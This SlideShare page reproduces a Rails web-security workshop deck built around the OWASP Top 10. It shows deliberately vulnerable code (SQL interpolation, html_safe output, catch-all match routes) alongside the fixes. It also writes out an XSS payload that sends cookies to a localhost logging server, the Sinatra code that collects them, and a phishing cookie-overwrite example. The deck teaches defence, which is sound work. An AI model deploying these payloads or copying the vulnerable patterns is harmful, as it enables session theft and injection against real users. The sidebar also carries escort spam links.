SlideShare une entreprise Scribd logo

Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example

A
Anna Klepacka

Web Applications Hacking – Ruby on Rails example. Attack web applications by using SQL attacks, CSRF, XSS. You will learn how to extract information by generating API json / xml and how to use cookies to code injection.

Logiciels
1  sur  65
Télécharger pour lire hors ligne
Web applications hacking Ruby on Rails example
● Software House located in Krakow ● Ruby on Rails, Android and iOS ● Specialized in building web and mobile applications ● Collaborating with many companies and startups from all over the world ABOUT US:
2009 - software house was founded 50 projects created 40 developers Awards: OUR HISTORY: Top Web & Software Developers in Poland 2015 Top Tens Ruby on Rails Development Companies
HOMEAHEAD
PROEST
Software for gastronomy
OWASP TOP 10 1. Injection 2. Broken authentication and session management 3. Cross-Site Scripting 4. Insecure direct object reference 5. Security misconfiguration 6. Sensitive data exposure 7. Missing function level access control 8. Cross-Site Request Forgery 9. Using components with known vulnerabilities 10. Unvalidated redirects and forwards
Target Application
Simple Ruby on Rails forum Ruby 2.3.0 Rails 4.2.6 PostgreSQL 9.4
PostgreSQL Database schema
# app/controllers/forum_threads_controller.rb class ForumThreadsController < ApplicationController def show @thread = ForumThread.find_by title: params[:title] end end # config/routes.rb resources :forum_threads, param: :title, only: :show do resources :comments, only: :create end SEARCHING THE FORUM THREAD BY TITLE:
# app/controllers/forum_threads_controller.rb class ForumThreadsController < ApplicationController def show @thread = ForumThread.find_by “title = #{params[:title]}” end end # config/routes.rb resources :forum_threads, param: :title, only: :show do resources :comments, only: :create end SEARCHING THE FORUM THREAD BY TITLE:
Is SQL injection impossible in Rails?
Unfortunately, no. It’s possible, just not dropping tables.
Further reading: rails-sqli.org
# app/controllers/comments_controller.rb class CommentsController < ApplicationController def create @thread = ForumThread.find params[:forum_thread_id] @comments = @thread.comments.build comment_params @comments.user = current_user if @comment.save redirect_to @thread, notice: ‘Successfully added new comment’ else redirect_to @thread, alert: “Couldn’t save comment“ end end private def comment_params params.require(:comment).permit(:content) end end # app/views/forum_threads/show.haml %p= comment.content COMMENTS - create and show:
# app/controllers/comments_controller.rb class CommentsController < ApplicationController def create @thread = ForumThread.find params[:forum_thread_id] @comments = @thread.comments.build comment_params @comments.user = current_user if @comment.save redirect_to @thread, notice: ‘Successfully added new comment’ else redirect_to @thread, alert: “Couldn’t save comment“ end end private def comment_params params.require(:comment).permit(:content) end end # app/views/forum_threads/show.haml %p= comment.content.html_safe COMMENTS - create and show:
<!-- XSS test --> Hi guys! <script> alert(“I came for your cookies!“) </script> <!-- Time to get some cookies! --> What’s up? <script> xhttp = new XMLHttpRequest(); xhttp.open(“GET”, “http://localhost:4567/cookies/” + document.cookie); xhttp.send(); </script> XSS ATTACK - TEST AND STEALING COOKIES
require ‘sinatra’ require ‘logger’ logger = Logger.new ‘log/cookies.log’ get ‘/cookies/:cookie’ do logger.info ‘=== COOKIE ===’ logger.info params[:cookie] logger.info ‘/== COOKIE ===’ end XSS ATTACK - SIMPLE COOKIES LOGGING SERVER
Are all cookies HTTPOnly in Rails?
cookies[:after_sign_in_path] = ‘http://localhost/after_sign_in_path’ // document.cookies=”after_sign_in_path=’http://malicious.site/phishing’” cookies.signed[:after_sign_in_path] = ‘http://localhost/after_sign_in_path’ // document.cookies=”after_sign_in_path=’http://malicious.site/phishing’” cookies.signed[:after_sign_in_path] = { value: ‘http://localhost/after_sign_in_path’, httponly: true } // finally safe UNFORTUNATELY - NO. ALWAYS USE THIS HASH!
It’s safe from cookies stealing, but is it safe from XSS?
# app/controllers/comments_controller.rb class CommentsController < ApplicationController def create @thread = ForumThread.find params[:forum_thread_id] @comments = @thread.comments.build comment_params @comments.user = current_user if @comment.save redirect_to @thread, notice: ‘Successfully added new comment’ else redirect_to @thread, alert: “Couldn’t save comment“ end end private def comment_params params.require(:comment).permit(:content) end end # app/views/forum_threads/show.haml %p= sanitize comment.content.html_safe COMMENTS - create and show:
Further reading: molily.de/xss/
# app/controllers/application_controller.rb class ApplicationController < ActionController::Base # Prevent CSRF attacks by raising an exception. # For APIs you may want to use :null_session instead. protect_from_forgery with: :exception end DEFAULT CSRF PROTECTION IN RAILS:
Is Rails CSRF protection unbreakable?
HTTP Verbs ● GET ● POST ● PUT ● PATCH ● DELETE ● HEAD ● OPTIONS ● TRACE ● CONNECT
HTTP Verbs NOT protected by Rails CSRF ● GET ● POST ● PUT ● PATCH ● DELETE ● HEAD ● OPTIONS ● TRACE ● CONNECT
CSRF pitfall in Rails routing
# config/routes.rb match ‘/forum_threads/:forum_thread_id/comments/:id/update’, to: ‘comments#update’, via: :all # Rails 4+ CSRF PITFALL IN RAILS ROUTING - MATCH:
Is Rails CSRF protection 100% safe?
Yes it is - unless you’re not staying close to Rails guides
Further reading: https://rorsecurity.info/portfolio/cross-site- request-forgery-and-rails
Sensitive data exposure 1. Credentials leaking to public repositories. 2. Lack of proper in-app authorization. 3. Debugging information in production enviroments. 4. Access not restricted, wrong access privileges. 5. Lack of encryption. 6. API responses containing sensitive data.
Protecting against sensitive data exposure 1. Code reviews. 2. Careful authorization. 3. Strict access. 4. Encryption. 5. API exposing only necessary information.
Creating the secure API
# app/controllers/forum_threads_controller.rb def index @threads = ForumThread.order(updated_at: :desc) respond_to do |format| format.html format.json { render json: @threads } end end GENERATED RAILS API
[ { ”id”: 2, ”title”: "Curabitur vel vulputate libero.", ”created_at”: "2016-04-18T10:10:40.648Z", ”updated_at”: "2016-04-18T10:10:40.648Z" }, { "id": 1, "title": "Lorem ipsum dolor sit amet.", "created_at": "2016-04-18T10:10:40.607Z", "updated_at": "2016-04-18T10:10:40.607Z" } ] GENERATED RAILS API - OUTPUT
# app/controllers/forum_threads_controller.rb def index @threads = ForumThread.order(updated_at: :desc) respond_to do |format| format.html format.json { render json: @threads.only(:title).to_json } end end GENERATED RAILS API - SECURING THE OUTPUT
[ { ”title”: "Curabitur vel vulputate libero." }, { "title": "Lorem ipsum dolor sit amet." } ] GENERATED RAILS API - SECURED OUTPUT
Solutions for building pretty, secure APIs Active Model Serializers ● Object Oriented approach ● Ability to define decorating methods ● All Ruby! ● Flexible ● Easy to test ● Adapter to follow JSON API v1.0 schema ● YARD documented Jbuilder ● Templates approach ● ERblike - might be easy for newcomers ● Flexible ● Hard to test ● No real “adapter” - if you want JSON API v1.0, you have to do it by yourself
Summary
Things to remember from this workshop: 1. Never trust anything that comes from user. Params, cookies, headers, everything. Nothing that comes from user is safe to use. 2. Always sanitize your HTML output. Especially when you’re allowing links or images that comes from user. 3. Be careful with match routing. Just don’t use it if you don’t have to. 4. Inspect your outputs. Return only necessary information from your API. 5. Last but not least. Get someone to review your code.
Thank you for your attention.
Na zjeździe 11 30-527 Krakow, Poland tel: +48 12 391 60 76 Silicon Valley Acceleration Center. 180 Sansome Street San Francisco, CA 94104 tel: 1-415-449-4791 info@railwaymen.org www.railwaymen.org @Railwaymen_org railwaymen.software.development /company/railwaymen

Recommandé

RoR Workshop - Web applications hacking - Ruby on Rails example
RoR Workshop - Web applications hacking - Ruby on Rails exampleRoR Workshop - Web applications hacking - Ruby on Rails example
RoR Workshop - Web applications hacking - Ruby on Rails exampleRailwaymen
 
How to CASifying PeopleSoft and Integrating CAS and ADFS
How to CASifying PeopleSoft and Integrating CAS and ADFSHow to CASifying PeopleSoft and Integrating CAS and ADFS
How to CASifying PeopleSoft and Integrating CAS and ADFSJohn Gasper
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsMikhail Egorov
 
What’s new in cas 4.2
What’s new in cas 4.2 What’s new in cas 4.2
What’s new in cas 4.2 Misagh Moayyed
 
Step by step to install exchange server 2013 sp1
Step by step to install exchange server 2013 sp1Step by step to install exchange server 2013 sp1
Step by step to install exchange server 2013 sp1laonap166
 
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Santiago Bassett
 
FOSSASIA 2021 - CAS
FOSSASIA 2021 - CASFOSSASIA 2021 - CAS
FOSSASIA 2021 - CASMisagh Moayyed
 
Apereo CAS 2020 - ESUP Days #31
Apereo CAS 2020 - ESUP Days #31Apereo CAS 2020 - ESUP Days #31
Apereo CAS 2020 - ESUP Days #31Misagh Moayyed
 

Recommandé

RoR Workshop - Web applications hacking - Ruby on Rails example
RoR Workshop - Web applications hacking - Ruby on Rails exampleRoR Workshop - Web applications hacking - Ruby on Rails example
RoR Workshop - Web applications hacking - Ruby on Rails exampleRailwaymen
 
How to CASifying PeopleSoft and Integrating CAS and ADFS
How to CASifying PeopleSoft and Integrating CAS and ADFSHow to CASifying PeopleSoft and Integrating CAS and ADFS
How to CASifying PeopleSoft and Integrating CAS and ADFSJohn Gasper
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsMikhail Egorov
 
What’s new in cas 4.2
What’s new in cas 4.2 What’s new in cas 4.2
What’s new in cas 4.2 Misagh Moayyed
 
Step by step to install exchange server 2013 sp1
Step by step to install exchange server 2013 sp1Step by step to install exchange server 2013 sp1
Step by step to install exchange server 2013 sp1laonap166
 
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Santiago Bassett
 
FOSSASIA 2021 - CAS
FOSSASIA 2021 - CASFOSSASIA 2021 - CAS
FOSSASIA 2021 - CASMisagh Moayyed
 
Apereo CAS 2020 - ESUP Days #31
Apereo CAS 2020 - ESUP Days #31Apereo CAS 2020 - ESUP Days #31
Apereo CAS 2020 - ESUP Days #31Misagh Moayyed
 
Getting Started with CAS
Getting Started with CASGetting Started with CAS
Getting Started with CASMisagh Moayyed
 
Apereo CAS: State of the Project 2018
Apereo CAS: State of the Project 2018Apereo CAS: State of the Project 2018
Apereo CAS: State of the Project 2018Misagh Moayyed
 
Webscraping with asyncio
Webscraping with asyncioWebscraping with asyncio
Webscraping with asyncioJose Manuel Ortega Candel
 
Vulnerability intelligence with vulners.com / Кирилл Ермаков, Игорь Булатенко...
Vulnerability intelligence with vulners.com / Кирилл Ермаков, Игорь Булатенко...Vulnerability intelligence with vulners.com / Кирилл Ермаков, Игорь Булатенко...
Vulnerability intelligence with vulners.com / Кирилл Ермаков, Игорь Булатенко...Ontico
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding GuideGeoffrey Vandiest
 
Intro to Deception techniques - Honey-*
Intro to Deception techniques - Honey-*Intro to Deception techniques - Honey-*
Intro to Deception techniques - Honey-*Harish Ramadoss
 
An introduction to php shells
An introduction to php shellsAn introduction to php shells
An introduction to php shellsRichieSM
 
How to use proxy server in .net application
How to use proxy server in .net applicationHow to use proxy server in .net application
How to use proxy server in .net applicationcodeandyou forums
 
Open Canary - novahackers
Open Canary - novahackersOpen Canary - novahackers
Open Canary - novahackersChris Gates
 
Construindo APIs Usando Rails
Construindo APIs Usando RailsConstruindo APIs Usando Rails
Construindo APIs Usando RailsFernando Kakimoto
 
Vault - Secret and Key Management
Vault - Secret and Key ManagementVault - Secret and Key Management
Vault - Secret and Key ManagementAnthony Ikeda
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
 
Introduksjon til web sikkerhet
Introduksjon til web sikkerhetIntroduksjon til web sikkerhet
Introduksjon til web sikkerhetHelge Sverre Hessevik Liseth
 
Owning the bad guys
Owning the bad guys Owning the bad guys
Owning the bad guys Santhosh Kumar
 
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)nyccamp
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Алексей Колосов - Drupal для хостинга
Алексей Колосов - Drupal для хостингаАлексей Колосов - Drupal для хостинга
Алексей Колосов - Drupal для хостингаDrupalSPB
 
HashiCorp's Vault - The Examples
HashiCorp's Vault - The ExamplesHashiCorp's Vault - The Examples
HashiCorp's Vault - The ExamplesMichał Czeraszkiewicz
 
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac DawsonCODE BLUE
 
Introduction to Infrastructure as Code & Automation / Introduction to Chef
Introduction to Infrastructure as Code & Automation / Introduction to ChefIntroduction to Infrastructure as Code & Automation / Introduction to Chef
Introduction to Infrastructure as Code & Automation / Introduction to ChefNathen Harvey
 
Session: A Reference Architecture for Running Modern APIs with NGINX Unit and...
Session: A Reference Architecture for Running Modern APIs with NGINX Unit and...Session: A Reference Architecture for Running Modern APIs with NGINX Unit and...
Session: A Reference Architecture for Running Modern APIs with NGINX Unit and...NGINX, Inc.
 

Contenu connexe

Tendances

Getting Started with CAS
Getting Started with CASGetting Started with CAS
Getting Started with CASMisagh Moayyed
 
Apereo CAS: State of the Project 2018
Apereo CAS: State of the Project 2018Apereo CAS: State of the Project 2018
Apereo CAS: State of the Project 2018Misagh Moayyed
 
Vulnerability intelligence with vulners.com / Кирилл Ермаков, Игорь Булатенко...
Vulnerability intelligence with vulners.com / Кирилл Ермаков, Игорь Булатенко...Vulnerability intelligence with vulners.com / Кирилл Ермаков, Игорь Булатенко...
Vulnerability intelligence with vulners.com / Кирилл Ермаков, Игорь Булатенко...Ontico
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Intro to Deception techniques - Honey-*
Intro to Deception techniques - Honey-*Intro to Deception techniques - Honey-*
Intro to Deception techniques - Honey-*Harish Ramadoss
 
An introduction to php shells
An introduction to php shellsAn introduction to php shells
An introduction to php shellsRichieSM
 
How to use proxy server in .net application
How to use proxy server in .net applicationHow to use proxy server in .net application
How to use proxy server in .net applicationcodeandyou forums
 
Open Canary - novahackers
Open Canary - novahackersOpen Canary - novahackers
Open Canary - novahackersChris Gates
 
Construindo APIs Usando Rails
Construindo APIs Usando RailsConstruindo APIs Usando Rails
Construindo APIs Usando RailsFernando Kakimoto
 
Vault - Secret and Key Management
Vault - Secret and Key ManagementVault - Secret and Key Management
Vault - Secret and Key ManagementAnthony Ikeda
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
 
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)nyccamp
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Алексей Колосов - Drupal для хостинга
Алексей Колосов - Drupal для хостингаАлексей Колосов - Drupal для хостинга
Алексей Колосов - Drupal для хостингаDrupalSPB
 
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac DawsonCODE BLUE
 

Tendances (20)

Getting Started with CAS
Getting Started with CASGetting Started with CAS
Getting Started with CAS
 
Apereo CAS: State of the Project 2018
Apereo CAS: State of the Project 2018Apereo CAS: State of the Project 2018
Apereo CAS: State of the Project 2018
 
Webscraping with asyncio
Webscraping with asyncioWebscraping with asyncio
Webscraping with asyncio
 
Vulnerability intelligence with vulners.com / Кирилл Ермаков, Игорь Булатенко...
Vulnerability intelligence with vulners.com / Кирилл Ермаков, Игорь Булатенко...Vulnerability intelligence with vulners.com / Кирилл Ермаков, Игорь Булатенко...
Vulnerability intelligence with vulners.com / Кирилл Ермаков, Игорь Булатенко...
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
 
Intro to Deception techniques - Honey-*
Intro to Deception techniques - Honey-*Intro to Deception techniques - Honey-*
Intro to Deception techniques - Honey-*
 
An introduction to php shells
An introduction to php shellsAn introduction to php shells
An introduction to php shells
 
How to use proxy server in .net application
How to use proxy server in .net applicationHow to use proxy server in .net application
How to use proxy server in .net application
 
Open Canary - novahackers
Open Canary - novahackersOpen Canary - novahackers
Open Canary - novahackers
 
Construindo APIs Usando Rails
Construindo APIs Usando RailsConstruindo APIs Usando Rails
Construindo APIs Usando Rails
 
Vault - Secret and Key Management
Vault - Secret and Key ManagementVault - Secret and Key Management
Vault - Secret and Key Management
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
 
Introduksjon til web sikkerhet
Introduksjon til web sikkerhetIntroduksjon til web sikkerhet
Introduksjon til web sikkerhet
 
Owning the bad guys
Owning the bad guys Owning the bad guys
Owning the bad guys
 
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Алексей Колосов - Drupal для хостинга
Алексей Колосов - Drupal для хостингаАлексей Колосов - Drupal для хостинга
Алексей Колосов - Drupal для хостинга
 
HashiCorp's Vault - The Examples
HashiCorp's Vault - The ExamplesHashiCorp's Vault - The Examples
HashiCorp's Vault - The Examples
 
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
 

Similaire à Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example

Introduction to Infrastructure as Code & Automation / Introduction to Chef
Introduction to Infrastructure as Code & Automation / Introduction to ChefIntroduction to Infrastructure as Code & Automation / Introduction to Chef
Introduction to Infrastructure as Code & Automation / Introduction to ChefNathen Harvey
 
Session: A Reference Architecture for Running Modern APIs with NGINX Unit and...
Session: A Reference Architecture for Running Modern APIs with NGINX Unit and...Session: A Reference Architecture for Running Modern APIs with NGINX Unit and...
Session: A Reference Architecture for Running Modern APIs with NGINX Unit and...NGINX, Inc.
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Automated infrastructure is on the menu
Automated infrastructure is on the menuAutomated infrastructure is on the menu
Automated infrastructure is on the menujtimberman
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooNahidul Kibria
 
Welcome Firefox OS in india with your app - Mumbai Firefox OS hackathon - 201...
Welcome Firefox OS in india with your app - Mumbai Firefox OS hackathon - 201...Welcome Firefox OS in india with your app - Mumbai Firefox OS hackathon - 201...
Welcome Firefox OS in india with your app - Mumbai Firefox OS hackathon - 201...Frédéric Harper
 
HTML for the Mobile Web, Firefox OS
HTML for the Mobile Web, Firefox OSHTML for the Mobile Web, Firefox OS
HTML for the Mobile Web, Firefox OSAll Things Open
 
FIWARE Primer - Learn FIWARE in 60 Minutes
FIWARE Primer - Learn FIWARE in 60 MinutesFIWARE Primer - Learn FIWARE in 60 Minutes
FIWARE Primer - Learn FIWARE in 60 MinutesFederico Michele Facca
 
Federico Michele Facca - FIWARE Primer - Learn FIWARE in 60 Minutes
Federico Michele Facca - FIWARE Primer - Learn FIWARE in 60 MinutesFederico Michele Facca - FIWARE Primer - Learn FIWARE in 60 Minutes
Federico Michele Facca - FIWARE Primer - Learn FIWARE in 60 MinutesCodemotion
 
how to use openstack api
how to use openstack apihow to use openstack api
how to use openstack apiLiang Bo
 
Apidaze WebRTC Workshop barcelona 21st april 2013
Apidaze WebRTC Workshop barcelona 21st april 2013Apidaze WebRTC Workshop barcelona 21st april 2013
Apidaze WebRTC Workshop barcelona 21st april 2013Alan Quayle
 
Open Source Identity Integration with OpenSSO
Open Source Identity Integration with OpenSSOOpen Source Identity Integration with OpenSSO
Open Source Identity Integration with OpenSSOelliando dias
 
Integrating WordPress With Web APIs
Integrating WordPress With Web APIsIntegrating WordPress With Web APIs
Integrating WordPress With Web APIsrandyhoyt
 
Solving anything in VCL
Solving anything in VCLSolving anything in VCL
Solving anything in VCLFastly
 
OSINT tools for security auditing with python
OSINT tools for security auditing with pythonOSINT tools for security auditing with python
OSINT tools for security auditing with pythonJose Manuel Ortega Candel
 
Web APIs & Apps - Mozilla
Web APIs & Apps - MozillaWeb APIs & Apps - Mozilla
Web APIs & Apps - MozillaRobert Nyman
 

Similaire à Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example (20)

Introduction to Infrastructure as Code & Automation / Introduction to Chef
Introduction to Infrastructure as Code & Automation / Introduction to ChefIntroduction to Infrastructure as Code & Automation / Introduction to Chef
Introduction to Infrastructure as Code & Automation / Introduction to Chef
 
Session: A Reference Architecture for Running Modern APIs with NGINX Unit and...
Session: A Reference Architecture for Running Modern APIs with NGINX Unit and...Session: A Reference Architecture for Running Modern APIs with NGINX Unit and...
Session: A Reference Architecture for Running Modern APIs with NGINX Unit and...
 
MesosCon - Be a microservices hero
MesosCon - Be a microservices heroMesosCon - Be a microservices hero
MesosCon - Be a microservices hero
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
2023-May.pptx
2023-May.pptx2023-May.pptx
2023-May.pptx
 
Html 5 boot camp
Html 5 boot campHtml 5 boot camp
Html 5 boot camp
 
Automated infrastructure is on the menu
Automated infrastructure is on the menuAutomated infrastructure is on the menu
Automated infrastructure is on the menu
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs too
 
Welcome Firefox OS in india with your app - Mumbai Firefox OS hackathon - 201...
Welcome Firefox OS in india with your app - Mumbai Firefox OS hackathon - 201...Welcome Firefox OS in india with your app - Mumbai Firefox OS hackathon - 201...
Welcome Firefox OS in india with your app - Mumbai Firefox OS hackathon - 201...
 
HTML for the Mobile Web, Firefox OS
HTML for the Mobile Web, Firefox OSHTML for the Mobile Web, Firefox OS
HTML for the Mobile Web, Firefox OS
 
FIWARE Primer - Learn FIWARE in 60 Minutes
FIWARE Primer - Learn FIWARE in 60 MinutesFIWARE Primer - Learn FIWARE in 60 Minutes
FIWARE Primer - Learn FIWARE in 60 Minutes
 
Federico Michele Facca - FIWARE Primer - Learn FIWARE in 60 Minutes
Federico Michele Facca - FIWARE Primer - Learn FIWARE in 60 MinutesFederico Michele Facca - FIWARE Primer - Learn FIWARE in 60 Minutes
Federico Michele Facca - FIWARE Primer - Learn FIWARE in 60 Minutes
 
how to use openstack api
how to use openstack apihow to use openstack api
how to use openstack api
 
Apidaze WebRTC Workshop barcelona 21st april 2013
Apidaze WebRTC Workshop barcelona 21st april 2013Apidaze WebRTC Workshop barcelona 21st april 2013
Apidaze WebRTC Workshop barcelona 21st april 2013
 
Open Source Identity Integration with OpenSSO
Open Source Identity Integration with OpenSSOOpen Source Identity Integration with OpenSSO
Open Source Identity Integration with OpenSSO
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
 
Integrating WordPress With Web APIs
Integrating WordPress With Web APIsIntegrating WordPress With Web APIs
Integrating WordPress With Web APIs
 
Solving anything in VCL
Solving anything in VCLSolving anything in VCL
Solving anything in VCL
 
OSINT tools for security auditing with python
OSINT tools for security auditing with pythonOSINT tools for security auditing with python
OSINT tools for security auditing with python
 
Web APIs & Apps - Mozilla
Web APIs & Apps - MozillaWeb APIs & Apps - Mozilla
Web APIs & Apps - Mozilla
 

Dernier

CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceCALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceanilsa9823
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...harshavardhanraghave
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsAndolasoft Inc
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...OnePlan Solutions
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsJhone kinadey
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVshikhaohhpro
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️Delhi Call girls
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdfWave PLM
 
